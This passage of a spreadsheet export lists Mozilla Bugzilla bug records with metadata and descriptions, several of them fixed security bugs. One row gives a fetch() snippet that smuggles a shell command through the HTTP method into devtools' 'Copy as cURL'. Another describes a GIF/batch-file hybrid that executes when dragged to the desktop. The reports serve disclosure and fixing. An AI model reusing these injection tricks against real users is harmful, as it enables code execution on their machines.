          <t>Infrastructure &amp; Operations Graveyard</t>
        </is>
      </c>
      <c r="J4390" t="inlineStr">
        <is>
          <t>WebOps: Other</t>
        </is>
      </c>
      <c r="K4390" t="inlineStr">
        <is>
          <t>other</t>
        </is>
      </c>
      <c r="L4390" t="inlineStr">
        <is>
          <t>x86</t>
        </is>
      </c>
      <c r="M4390" t="inlineStr">
        <is>
          <t>macOS</t>
        </is>
      </c>
      <c r="N4390" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O4390" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P4390" t="inlineStr"/>
      <c r="Q4390" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R4390" t="inlineStr">
        <is>
          <t>blocker</t>
        </is>
      </c>
      <c r="S4390" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T4390" t="n">
        <v>1</v>
      </c>
      <c r="U4390" t="n">
        <v>0</v>
      </c>
      <c r="V4390" t="n">
        <v>3</v>
      </c>
      <c r="W4390" t="inlineStr">
        <is>
          <t>The form on https://www.mozilla.org/en-US/apps/ is broken.
It was working yesterday, so not sure what changed. That page is about to be seen by lots of people so this needs to get fixed ASAP.
I'm not getting any emails with the 500 error. It uses a basket-client Python library to POST the data to our email subscription service. Please ping me (jlongster) on IRC and I can help figure this out.</t>
        </is>
      </c>
      <c r="X4390" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="4391">
      <c r="A4391" t="n">
        <v>1607742</v>
      </c>
      <c r="B4391" t="inlineStr">
        <is>
          <t>2020-01-08 05:17:54 -0800</t>
        </is>
      </c>
      <c r="C4391" t="inlineStr">
        <is>
          <t>'Copy As Curl' in the network panel of the devtools does not escape the HTTP method properly, leading to local code execution</t>
        </is>
      </c>
      <c r="D4391" t="inlineStr">
        <is>
          <t>2024-05-30 10:06:12 -0700</t>
        </is>
      </c>
      <c r="E4391" t="n">
        <v>1</v>
      </c>
      <c r="F4391" t="n">
        <v>1</v>
      </c>
      <c r="G4391" t="n">
        <v>3</v>
      </c>
      <c r="H4391" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I4391" t="inlineStr">
        <is>
          <t>DevTools</t>
        </is>
      </c>
      <c r="J4391" t="inlineStr">
        <is>
          <t>Netmonitor</t>
        </is>
      </c>
      <c r="K4391" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L4391" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M4391" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N4391" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O4391" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P4391" t="inlineStr">
        <is>
          <t>[reporter-external] [client-bounty-form] [verif?][post-critsmash-triage][adv-main74+][adv-esr68.6+]</t>
        </is>
      </c>
      <c r="Q4391" t="inlineStr">
        <is>
          <t>P2</t>
        </is>
      </c>
      <c r="R4391" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S4391" t="inlineStr">
        <is>
          <t>Firefox 75</t>
        </is>
      </c>
      <c r="T4391" t="n">
        <v>1</v>
      </c>
      <c r="U4391" t="n">
        <v>0</v>
      </c>
      <c r="V4391" t="n">
        <v>16</v>
      </c>
      <c r="W4391" t="inlineStr">
        <is>
          <t>Created attachment 9119373
bug.html
Firefox devtools have a 'network' panel, where all the requests made by the current webpage are listed.
In this panel, the user can right-click on a query, and then select 'Copy As cURL'. The user is then expected to paste what he just copied into a terminal.
The issue is that the HTTP method of the request, which is controlled by the potentially malicious webpage, is not escaped when the curl command is formed.
As an example, the following javascript snippet will make a problematic request:
fetch('', {method: '|evilcommand|'});
When this snippet is run, and then a naive user uses 'Copy as cURL' on the generated request and then pastes it into a terminal, evilcommand is executed.
Note: an HTTP verb cannot contain a space (so one can not launch evilcommand with arguments), but the following characters are allowed, making it possible to construct  complex malicious payloads: ` ' . * $ &amp; | ~.</t>
        </is>
      </c>
      <c r="X4391" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="4392">
      <c r="A4392" t="n">
        <v>279945</v>
      </c>
      <c r="B4392" t="inlineStr">
        <is>
          <t>2005-01-26 12:34:38 -0800</t>
        </is>
      </c>
      <c r="C4392" t="inlineStr">
        <is>
          <t>Image drag and drop allows to create executable files</t>
        </is>
      </c>
      <c r="D4392" t="inlineStr">
        <is>
          <t>2008-03-31 21:08:30 -0700</t>
        </is>
      </c>
      <c r="E4392" t="n">
        <v>1</v>
      </c>
      <c r="F4392" t="n">
        <v>1</v>
      </c>
      <c r="G4392" t="n">
        <v>3</v>
      </c>
      <c r="H4392" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I4392" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J4392" t="inlineStr">
        <is>
          <t>Layout</t>
        </is>
      </c>
      <c r="K4392" t="inlineStr">
        <is>
          <t>1.7 Branch</t>
        </is>
      </c>
      <c r="L4392" t="inlineStr">
        <is>
          <t>x86</t>
        </is>
      </c>
      <c r="M4392" t="inlineStr">
        <is>
          <t>Windows XP</t>
        </is>
      </c>
      <c r="N4392" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O4392" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P4392" t="inlineStr">
        <is>
          <t>[sg:fix]</t>
        </is>
      </c>
      <c r="Q4392" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R4392" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S4392" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T4392" t="n">
        <v>1</v>
      </c>
      <c r="U4392" t="n">
        <v>0</v>
      </c>
      <c r="V4392" t="n">
        <v>31</v>
      </c>
      <c r="W4392" t="inlineStr">
        <is>
          <t>User-Agent:       Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.5) Gecko/20041107 Firefox/1.0
Build Identifier: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.5) Gecko/20041107 Firefox/1.0
By dynamicly creating a hybrid of a gif image and a batch file it is possible to
create an executable file by dragging an image to the desktop.  
Reproducible: Always
Steps to Reproduce:
1. Open http://www.mikx.de/firedragging/
2. Drag the image to your desktop
3. Open the dropped file using double click
Actual Results:  
The file foximg.bat gets created on dektop
Expected Results:  
The file foximg.gif or a link to foximg.gif/foximg.php should be created. 
Usually Firefox prevents that an executable, non-image file gets directly
dragged to the desktop (e.g. by supplying malware.exe as the src of an image
tag). Instead Firefox creates a link to the file on the desktop. 
If you create a hybrid of a gif image and a batch file you can trick firefox
(see PoC link). Since the file renders as a valid image (the gif parser seems to
be pretty forgiving) firefox tries to copy the image to the desktop when
dragged. If you create the image dynamicly and fore the content type image/gif
the file can be of any extension (e.g. image.bat or image.exe). 
The windows batch file parser is also forgiving. It just ignores the first line
of "gif trash" and execute whatever you append to the end of the hybrid file.
The PoC creates the directory "c:\booom".
Since windows hides known file extensions by default a user can only tell that
something went wrong by looking at the file icon, which is different of course
(depending on file association). If the user does not care or know what this
different icon means a double click to view or edit the "image" he just dropped
executes the batch file instead.
Tested with Firefox 0.9.2, 1.0 and the nightly latest-trunk build from
2005-01-26 on Windws XP SP2. Files served from Apache 1.3 and PHP 5.</t>
        </is>
      </c>
      <c r="X4392" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="4393">
      <c r="A4393" t="n">
        <v>1437317</v>
      </c>
      <c r="B4393" t="inlineStr">
        <is>
          <t>2018-02-10 13:50:39 -0800</t>
        </is>
      </c>
      <c r="C4393" t="inlineStr">
        <is>
          <t>Re-enable test_jobs_api.py's test_job_error_lines()</t>
        </is>
      </c>
      <c r="D4393" t="inlineStr">
        <is>
          <t>2018-02-13 09:46:15 -0800</t>
        </is>
      </c>
      <c r="E4393" t="n">
        <v>1</v>
      </c>
      <c r="F4393" t="n">
        <v>1</v>
      </c>
      <c r="G4393" t="n">
        <v>7</v>
      </c>
      <c r="H4393" t="inlineStr">
        <is>
          <t>Developer Infrastructure</t>
        </is>
      </c>
      <c r="I4393" t="inlineStr">
        <is>
          <t>Tree Management</t>
        </is>
      </c>
      <c r="J4393" t="inlineStr">
        <is>
          <t>Treeherder: API</t>
        </is>
      </c>
      <c r="K4393" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="L4393" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M4393" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N4393" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O4393" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P4393" t="inlineStr"/>
      <c r="Q4393" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R4393" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S4393" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T4393" t="n">
        <v>1</v>
      </c>
      <c r="U4393" t="n">
        <v>0</v>
      </c>
      <c r="V4393" t="n">
        <v>4</v>
      </c>
      <c r="W4393" t="inlineStr">
        <is>
          <t>Since it's currently skipped:
@pytest.mark.skipif(True, reason="Awaiting landing of Bug 1177519")
def test_job_error_lines(webapp, eleven_jobs_stored, failure_lines, classified_failures)
...
...but bug 1177519 has already landed.
https://github.com/mozilla/treeherder/blob/a74003f41b38d8d5198db7dfab056fbe19133d75/tests/webapp/api/test_jobs_api.py#L292</t>
        </is>
      </c>
      <c r="X4393" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="4394">
      <c r="A4394" t="n">
        <v>322045</v>
      </c>
      <c r="B4394" t="inlineStr">
        <is>
          <t>2006-01-01 02:34:48 -0800</t>
        </is>
      </c>
      <c r="C4394" t="inlineStr">
        <is>
          <t>CVE-2006-0293 GC hazard during function allocation.</t>
        </is>
      </c>
      <c r="D4394" t="inlineStr">
        <is>
          <t>2007-08-29 11:12:14 -0700</t>
        </is>
      </c>
      <c r="E4394" t="n">
        <v>1</v>
      </c>
      <c r="F4394" t="n">
        <v>1</v>
      </c>
      <c r="G4394" t="n">
        <v>3</v>
      </c>
      <c r="H4394" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I4394" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J4394" t="inlineStr">
        <is>
          <t>JavaScript Engine</t>
        </is>
      </c>
      <c r="K4394" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L4394" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M4394" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N4394" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O4394" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P4394" t="inlineStr">
        <is>
          <t>checked into trunk Jan 2 -- baking</t>
        </is>
      </c>
      <c r="Q4394" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R4394" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S4394" t="inlineStr">
        <is>
          <t>mozilla1.9alpha1</t>
        </is>
      </c>
      <c r="T4394" t="n">
        <v>1</v>
      </c>
      <c r="U4394" t="n">
        <v>0</v>
      </c>
      <c r="V4394" t="n">
        <v>24</v>
      </c>
      <c r="W4394" t="inlineStr">
        <is>
          <t>js_NewFunction from jsfun.c contains the following code:
    /* Allocate a function struct. */
     fun = (JSFunction *) js_NewGCThing(cx, GCX_PRIVATE,
sizeof(JSFunction));
     if (!fun)
         return NULL;
     /* If funobj is null, allocate an object for it. */
     if (funobj) {
         OBJ_SET_PARENT(cx, funobj, parent);
     } else {
         funobj = js_NewObject(cx, &amp;js_FunctionClass, NULL, parent);
Since js_NewObject also allocates slots using GCX_PRIVATE, it will remove
"fun" from "cx-&gt;newborn[GCX_PRIVATE]". If JS embedding installs JSRuntime.objectHook which triggers GC during "funobj" allocation, "fun" would be GC-ed when js_NewObject returns to js_NewFunction.
This is one possible reason for bug 317815.</t>
        </is>
      </c>
      <c r="X4394" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="4395">
      <c r="A4395" t="n">
        <v>289940</v>
      </c>
      <c r="B4395" t="inlineStr">
        <is>
          <t>2005-04-11 11:25:53 -0700</t>
        </is>
      </c>
      <c r="C4395" t="inlineStr">
        <is>
          <t>Chrome code needs to be protected from untrusted events.</t>
        </is>
      </c>
      <c r="D4395" t="inlineStr">
        <is>
          <t>2006-08-28 06:45:23 -0700</t>
        </is>
      </c>
      <c r="E4395" t="n">
        <v>1</v>
      </c>
      <c r="F4395" t="n">
        <v>1</v>
      </c>
      <c r="G4395" t="n">
        <v>3</v>
      </c>
      <c r="H4395" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I4395" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J4395" t="inlineStr">
        <is>
          <t>DOM: Events</t>
        </is>
      </c>
      <c r="K4395" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L4395" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M4395" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N4395" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O4395" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P4395" t="inlineStr">
        <is>
          <t>[sg:fix] need branch landing , needed for b2 cuz it breaks things</t>
        </is>
      </c>
      <c r="Q4395" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R4395" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S4395" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T4395" t="n">
        <v>1</v>
      </c>
      <c r="U4395" t="n">
        <v>0</v>
      </c>
      <c r="V4395" t="n">
        <v>57</v>
      </c>
      <c r="W4395" t="inlineStr">
        <is>
          <t>Right now our chrome code generally excpects its event handlers to be called
onyl from the code that normally fires the events in question, but lots of event
handlers listen for events that can be synthesized by untrusted content, and
we're thus vulnerable to security problems, or at least unexpected code
execution. We have a solution for this problem, and that is to check if the
event in question is trusted or not, but way too often this check is omitted and
it's by now unlikely to expect this problem to be fixable by adding those
checks, and not forgetting those checks in new code etc.
The safer fix for this problem is to simply stop delivering untrusted events to
chrome code. This way, if people forget something related to this, their code
won't work rather than having security problems creep into the code. The
potential problem with this approach is that existing code that does rely on
untrusted events in chrome code is broken by this change. But I think that's
inevitable, and I'm hoping the breakage won't be too broad. Because of this, we
do need an alternate apporach that the code that does indeed need to see
untrusted events from chrome code can use. That will be done by an optional
additional argument to the addEventListener() method that tells whether the
listener wants untrusted events or not. By default content code will get them,
chrome code won't.
The big part of this change is to mark all our internal events as trusted, where
applicable. This will be done by changing the constructors of the various
ns*Event classes such that the C++ compiler will require you to specify if an
event is trusted or not. Patch coming up (tested only on Win32 and Gtk2 builds
for now).
(marking security sensitive to keep the visibility of this problem down for now)</t>
        </is>
      </c>
      <c r="X4395" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="4396">
      <c r="A4396" t="n">
        <v>62085</v>
      </c>
      <c r="B4396" t="inlineStr">
        <is>
          <t>2000-12-06 08:06:21 -0800</t>
        </is>
      </c>
      <c r="C4396" t="inlineStr">
        <is>
          <t>cannot open secure site</t>
        </is>
      </c>
      <c r="D4396" t="inlineStr">
        <is>
          <t>2016-09-27 13:03:20 -0700</t>
        </is>
      </c>
      <c r="E4396" t="n">
        <v>1</v>
      </c>
      <c r="F4396" t="n">
        <v>1</v>
      </c>
      <c r="G4396" t="n">
        <v>6</v>
      </c>
      <c r="H4396" t="inlineStr">
        <is>
          <t>Graveyard</t>
        </is>
      </c>
      <c r="I4396" t="inlineStr">
        <is>
          <t>Core Graveyard</t>
        </is>
      </c>
      <c r="J4396" t="inlineStr">
        <is>
          <t>Security: UI</t>
        </is>
      </c>
      <c r="K4396" t="inlineStr">
        <is>
          <t>1.0 Branch</t>
        </is>
      </c>
      <c r="L4396" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M4396" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N4396" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O4396" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P4396" t="inlineStr"/>
      <c r="Q4396" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R4396" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S4396" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T4396" t="n">
        <v>1</v>
      </c>
      <c r="U4396" t="n">
        <v>0</v>
      </c>
      <c r="V4396" t="n">
        <v>36</v>
      </c>
      <c r="W4396" t="inlineStr">
        <is>
          <t>seen on commercial build 2000-12-06-05-Mtrunk
-attempt to open above URL
expected results: site opens.
tested results: throbber flashes briefly. status say connecting, but the page 
never opens</t>
        </is>
      </c>
      <c r="X4396" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="4397">
      <c r="A4397" t="n">
        <v>1085773</v>
      </c>
      <c r="B4397" t="inlineStr">
        <is>
          <t>2014-10-20 20:02:36 -0700</t>
        </is>
      </c>
      <c r="C4397" t="inlineStr">
        <is>
          <t>Reset PIN fails with FXA_FAILED error</t>
        </is>
      </c>
      <c r="D4397" t="inlineStr">
        <is>
          <t>2014-11-10 07:04:17 -0800</t>
        </is>
      </c>
      <c r="E4397" t="n">
        <v>1</v>
      </c>
      <c r="F4397" t="n">
        <v>1</v>
      </c>
      <c r="G4397" t="n">
        <v>6</v>
      </c>
      <c r="H4397" t="inlineStr">
        <is>
          <t>Graveyard</t>
        </is>
      </c>
      <c r="I4397" t="inlineStr">
        <is>
          <t>Marketplace Graveyard</t>
        </is>
      </c>
      <c r="J4397" t="inlineStr">
        <is>
          <t>Payments/Refunds</t>
        </is>
      </c>
      <c r="K4397" t="inlineStr">
        <is>
          <t>1.4</t>
        </is>
      </c>
      <c r="L4397" t="inlineStr">
        <is>
          <t>x86</t>
        </is>
      </c>
      <c r="M4397" t="inlineStr">
        <is>
          <t>Gonk (Firefox OS)</t>
        </is>
      </c>
      <c r="N4397" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O4397" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P4397" t="inlineStr"/>
      <c r="Q4397" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R4397" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S4397" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T4397" t="n">
        <v>1</v>
      </c>
      <c r="U4397" t="n">
        <v>0</v>
      </c>
      <c r="V4397" t="n">
        <v>3</v>
      </c>
      <c r="W4397" t="inlineStr">
        <is>
          <t>Created attachment 8508424
video
Connectivity: wifi
SIM used:
Gaia/device: Flame; Boot2Gecko 1.4.00-prerelease
Platform version 30.0
Build Identifier 20141020000203
Git commit info: 2014-10-15 077d245f
steps to reproduce:
1. Start the purchase in in-app payment tester app against marketplace-dev
2. Sign in using FxA to an existing account
3. In the Enter PIN screen, click on 'Forgot PIN?'
4. Confirm reset
expected behavior:
User is prompted to enter their FxA credentials
actual behavior:
Reset PIN fails with FxA failed
sentry:
10-20 20:00:21.637 I/Gecko   (  208): -*- RadioInterface[0]: Received message from worker: {"voice":{"signalStrength":-99,"relSignalStrength":44},"data":{"signalStrength":-99,"relSignalStrength":44},"rilMessageType":"signalstrengthchange","rilMessageClientId":0}
10-20 20:00:21.637 I/Gecko   (  208): -*- RILContentHelper: Received message 'RIL:VoiceInfoChanged': {"clientId":0,"data":{"connected":true,"emergencyCallsOnly":false,"roaming":false,"network":{"longName":"AT&amp;T","shortName":"","mcc":"310","mnc":"410","rilMessageClientId":0},"cell":{"gsmLocationAreaCode":56967,"gsmCellId":4116404},"type":"umts","signalStrength":-99,"relSignalStrength":44,"state":"registered"}}
10-20 20:00:21.687 I/Gecko   (  208): -*- RILContentHelper: Received message 'RIL:DataInfoChanged': {"clientId":0,"data":{"connected":false,"emergencyCallsOnly":false,"roaming":false,"network":{"longName":"AT&amp;T","shortName":"","mcc":"310","mnc":"410","rilMessageClientId":0},"cell":{"gsmLocationAreaCode":56967,"gsmCellId":4116404},"type":"hspa","signalStrength":-99,"relSignalStrength":44,"state":"registered"}}
10-20 20:00:22.267 E/GeckoConsole(  208): Content JS LOG at https://marketplace-dev.mozflare.net/mozpay/spa/js/main.min.js?bust=b3330359845c9267e134c9135faf921716d564d1:65 in c&lt;.forceReAuthentication: [views][force-auth] Starting forceAuthTimer
10-20 20:00:22.267 E/GeckoConsole(  208): Content JS LOG at https://marketplace-dev.mozflare.net/mozpay/spa/js/main.min.js?bust=b3330359845c9267e134c9135faf921716d564d1:65 in r&lt;.render: [views][throbber] rendering throbber: Connecting to Persona
10-20 20:00:22.267 E/GeckoConsole(  208): Content JS LOG at https://marketplace-dev.mozflare.net/mozpay/spa/js/main.min.js?bust=b3330359845c9267e134c9135faf921716d564d1:65 in c&lt;.renderTemplate: [views][base] Replacing $el with rendered content
10-20 20:00:22.267 E/GeckoConsole(  208): Content JS LOG at https://marketplace-dev.mozflare.net/mozpay/spa/js/main.min.js?bust=b3330359845c9267e134c9135faf921716d564d1:62 in .supportsNativeFxA: [utils] settings.enableNativeFxA: false
10-20 20:00:22.547 E/GeckoConsole(  208): Content JS LOG at https://marketplace-dev.mozflare.net/mozpay/spa/js/main.min.js?bust=b3330359845c9267e134c9135faf921716d564d1:63 in s/&lt;: [lib][auth] error
10-20 20:00:22.547 E/GeckoConsole(  208): Content JS LOG at https://marketplace-dev.mozflare.net/mozpay/spa/js/main.min.js?bust=b3330359845c9267e134c9135faf921716d564d1:63 in s/&lt;: [lib][auth] 502
10-20 20:00:22.557 E/GeckoConsole(  208): Content JS LOG at https://marketplace-dev.mozflare.net/mozpay/spa/js/main.min.js?bust=b3330359845c9267e134c9135faf921716d564d1:63 in s/&lt;: [lib][auth] login error
10-20 20:00:22.557 E/GeckoConsole(  208): Content JS LOG at https://marketplace-dev.mozflare.net/mozpay/spa/js/main.min.js?bust=b3330359845c9267e134c9135faf921716d564d1:66 in o&lt;.render: [views][error] {"cancelModifier":"cancel","cancelText":"Cancel","ctaText":"OK","errorCode":"FXA_FAILED","heading":"Error","msg":"An unexpected error occurred.","showCancel":true,"showCta":false}
10-20 20:00:22.557 E/GeckoConsole(  208): Content JS LOG at https://marketplace-dev.mozflare.net/mozpay/spa/js/main.min.js?bust=b3330359845c9267e134c9135faf921716d564d1:66 in o&lt;.render: [views][error] Rendering Error template
10-20 20:00:22.557 E/GeckoConsole(  208): Content JS LOG at https://marketplace-dev.mozflare.net/mozpay/spa/js/main.min.js?bust=b3330359845c9267e134c9135faf921716d564d1:65 in c&lt;.renderTemplate: [views][base] Replacing $el with rendered content</t>
        </is>
      </c>
      <c r="X4397" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="4398">
      <c r="A4398" t="n">
        <v>461027</v>
      </c>
      <c r="B4398" t="inlineStr">
        <is>
          <t>2008-10-21 13:28:17 -0700</t>
        </is>
      </c>
      <c r="C4398" t="inlineStr">
        <is>
          <t>Crash [@ nsContentUtils::ComparePosition] with binding</t>
        </is>
      </c>
      <c r="D4398" t="inlineStr">
        <is>
          <t>2011-06-13 10:01:47 -0700</t>
        </is>
      </c>
      <c r="E4398" t="n">
        <v>1</v>
      </c>
      <c r="F4398" t="n">
        <v>1</v>
      </c>
      <c r="G4398" t="n">
        <v>3</v>
      </c>
      <c r="H4398" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I4398" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J4398" t="inlineStr">
        <is>
          <t>XBL</t>
        </is>
      </c>
      <c r="K4398" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L4398" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M4398" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N4398" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O4398" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P4398" t="inlineStr">
        <is>
          <t>[sg:critical?] post 1.8-branch</t>
        </is>
      </c>
      <c r="Q4398" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R4398" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S4398" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T4398" t="n">
        <v>1</v>
      </c>
      <c r="U4398" t="n">
        <v>0</v>
      </c>
      <c r="V4398" t="n">
        <v>19</v>
      </c>
      <c r="W4398" t="inlineStr">
        <is>
          <t>Created attachment 344166
testcase
See testcase, which crashes in current trunk build.
This regressed between 2008-06-22 and 2008-06-23:
http://hg.mozilla.org/mozilla-central/pushloghtml?startdate=2008-06-22+04%3A00%3A00&amp;enddate=2008-06-23+08%3A00%3A00
I think a regression from bug 344258.
Stacktrace from debug build:
 	gklayout.dll!nsContentUtils::GetContextForEventHandlers(nsINode * aNode=0x09af6478, nsIScriptContext * * aContext=0x00000004)  Line 4354 + 0x3 bytes	C++
&gt;	gklayout.dll!nsGenericElement::GetContextForEventHandlers(nsIScriptContext * * aContext=0x00000004)  Line 346 + 0xd bytes	C++
 	gklayout.dll!nsContentUtils::ComparePosition(nsINode * aNode1=0x0883bac8, nsINode * aNode2=0x09af6478)  Line 1533 + 0xf bytes	C++
 	gklayout.dll!nsContentUtils::PositionIsBefore(nsINode * aNode1=0x0883bac8, nsINode * aNode2=0x09af6478)  Line 280 + 0xd bytes	C++
 	gklayout.dll!nsIdentifierMapEntry::AddIdContent(nsIContent * aContent=0x0883bac8)  Line 459 + 0xd bytes	C++
 	gklayout.dll!nsDocument::UpdateIdTableEntry(nsIContent * aContent=0x0883bac8)  Line 2272	C++
 	gklayout.dll!nsXULDocument::AddElementToDocumentPre(nsIContent * aElement=0x0883bac8)  Line 1625	C++
 	gklayout.dll!nsXULDocument::AddSubtreeToDocument(nsIContent * aElement=0x0883bac8)  Line 1705 + 0x12 bytes	C++
 	gklayout.dll!nsXBLBinding::InstallAnonymousContent(nsIContent * aAnonParent=0x0883ba78, nsIContent * aElement=0x0997dd38)  Line 371	C++
 	gklayout.dll!nsXBLBinding::GenerateAnonymousContent()  Line 663	C++
 	gklayout.dll!nsXBLService::LoadBindings(nsIContent * aContent=0x0997dd38, nsIURI * aURL=0x095f2ee8, nsIPrincipal * aOriginPrincipal=0x087028e8, int aAugmentFlag=0, nsXBLBinding * * aBinding=0x0012eb5c, int * aResolveStyle=0x0012eb30)  Line 631	C++
 	gklayout.dll!nsCSSFrameConstructor::ConstructFrameInternal(nsFrameConstructorState &amp; aState={...}, nsIContent * aContent=0x0997dd38, nsIFrame * aParentFrame=0x095ff008, nsIAtom * aTag=0x012e38bc, int aNameSpaceID=6, nsStyleContext * aStyleContext=0x095ff0d0, nsFrameItems &amp; aFrameItems={...}, int aXBLBaseTag=0)  Line 7424 + 0x53 bytes	C++
 	gklayout.dll!nsCSSFrameConstructor::ConstructFrame(nsFrameConstructorState &amp; aState={...}, nsIContent * aContent=0x0997dd38, nsIFrame * aParentFrame=0x095ff008, nsFrameItems &amp; aFrameItems={...})  Line 7379 + 0x35 bytes	C++
 	gklayout.dll!nsCSSFrameConstructor::ProcessInlineChildren(nsFrameConstructorState &amp; aState={...}, nsIContent * aContent=0x09945ef0, nsIFrame * aFrame=0x095ff008, int aCanHaveGeneratedContent=1, nsFrameItems &amp; aFrameItems={...}, int * aKidsAllInline=0x0012ede4)  Line 12618 + 0x3a bytes	C++
 	gklayout.dll!nsCSSFrameConstructor::ConstructInline(nsFrameConstructorState &amp; aState={...}, const nsStyleDisplay * aDisplay=0x095fecf0, nsIContent * aContent=0x09945ef0, nsIFrame * aParentFrame=0x095fe714, nsStyleContext * aStyleContext=0x095fefb8, int aIsPositioned=0, nsIFrame * aNewFrame=0x095ff008)  Line 12390 + 0x21 bytes	C++
 	gklayout.dll!nsCSSFrameConstructor::ConstructFrameByDisplayType(nsFrameConstructorState &amp; aState={...}, const nsStyleDisplay * aDisplay=0x095fecf0, nsIContent * aContent=0x09945ef0, int aNameSpaceID=6, nsIAtom * aTag=0x012e38c8, nsIFrame * aParentFrame=0x095fe714, nsStyleContext * aStyleContext=0x095fefb8, nsFrameItems &amp; aFrameItems={...}, int aHasPseudoParent=0)  Line 6591 + 0x22 bytes	C++
 	gklayout.dll!nsCSSFrameConstructor::ConstructFrameInternal(nsFrameConstructorState &amp; aState={...}, nsIContent * aContent=0x09945ef0, nsIFrame * aParentFrame=0x095fe714, nsIAtom * aTag=0x012e38c8, int aNameSpaceID=6, nsStyleContext * aStyleContext=0x095fefb8, nsFrameItems &amp; aFrameItems={...}, int aXBLBaseTag=0)  Line 7558 + 0x34 bytes	C++
